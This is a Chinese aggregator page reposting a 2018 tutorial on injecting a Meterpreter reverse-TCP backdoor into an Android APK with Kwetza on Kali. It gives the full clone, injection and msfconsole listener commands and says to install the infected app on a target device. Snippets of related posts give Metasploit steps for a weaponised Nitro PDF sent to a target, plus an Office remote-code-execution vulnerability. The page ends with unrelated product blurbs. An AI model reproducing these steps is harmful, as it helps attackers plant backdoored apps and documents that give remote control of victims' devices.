kali下Kwetza进行安卓APK文件恶意注入-低调大师

kali下Kwetza进行安卓APK文件恶意注入

2018-02-27 798

参考：https://www.youtube.com/watch?v=sP8CtMPAwzY
https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

cd /tmp
git clone https://github.com/sensepost/kwetza
cd kwetza
python kwetza.py baidu.apk 监听者IP 监听端口 yes
#这里选取了百度的apk文件做测试
随便输入一个密码
得到新生成的apk文件
将注入完成的apk文件安装在目标设备
也可以本机
xdg-open baidu.apk

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 监听者IP
set lport 监听端口
exploit

微信关注我们

原文链接：https://yq.aliyun.com/articles/628536

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

kali下CVE_2017_7442利用实验

版权声明：转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396580 参考：https://www.exploit-db.com/exploits/42418/https://www.youtube.com/watch?v=EhW9GhLF_Ww Nitro Pro PDF Reader 11.0.3.173 Javascript API远程执行代码 msfconsole search nitro_pdf use exploit/windows/fileformat/nitro_pdf_jspapi set payload windows/meterpreter/reverse_tcp set lhost 本机IP set lport 本机端口 set FILENAME test.pdf exploit 将生成的pdf文件cp出来，发给目标机。前提是，目标机安装了https://www.gonitro.com 打开pdf以后，自动获得目标shel...

2018-02-28

849

版权声明：转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396588 参考：https://www.youtube.com/watch?v=jUhmPH_u6gshttps://github.com/tezukanice/Office8570https://www.symantec.com/security_response/vulnerability.jsp?bid=99445https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570 简介：Microsoft Office容易出现远程代码执行漏洞。攻击者可以利用此问题在当前登录的用户的上下文中执行任意代码。漏洞尝试可能会导致拒绝服务条件。影响范围： Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit edition...

2018-02-28

662

资源下载

更多资源

腾讯云软件源

为解决软件依赖安装时官方源访问速度慢的问题，腾讯云为一些软件搭建了缓存服务。您可以通过使用腾讯云软件源站来提升依赖包的安装速度。为了方便用户自由搭建服务架构，目前腾讯云软件源站支持公网访问和内网访问。

Nacos

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service 的首字母简称，一个易于构建 AI Agent 应用的动态服务发现、配置管理和AI智能体管理平台。Nacos 致力于帮助您发现、配置和管理微服务及AI智能体应用。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据、流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。

Spring

Spring框架（Spring Framework）是由Rod Johnson于2002年提出的开源Java企业级应用框架，旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念，提供核心容器、应用上下文、数据访问集成等模块，支持整合Hibernate、Struts等第三方框架，其适用范围不仅限于服务器端开发，绝大多数Java应用均可从中受益。

Rocky Linux

Rocky Linux（中文名：洛基）是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版，作为CentOS稳定版停止维护后与RHEL（Red Hat Enterprise Linux）完全兼容的开源替代方案，由社区拥有并管理，支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性，采用模块化包装和SELinux安全架构，默认包含GNOME桌面环境及XFS文件系统，支持十年生命周期更新。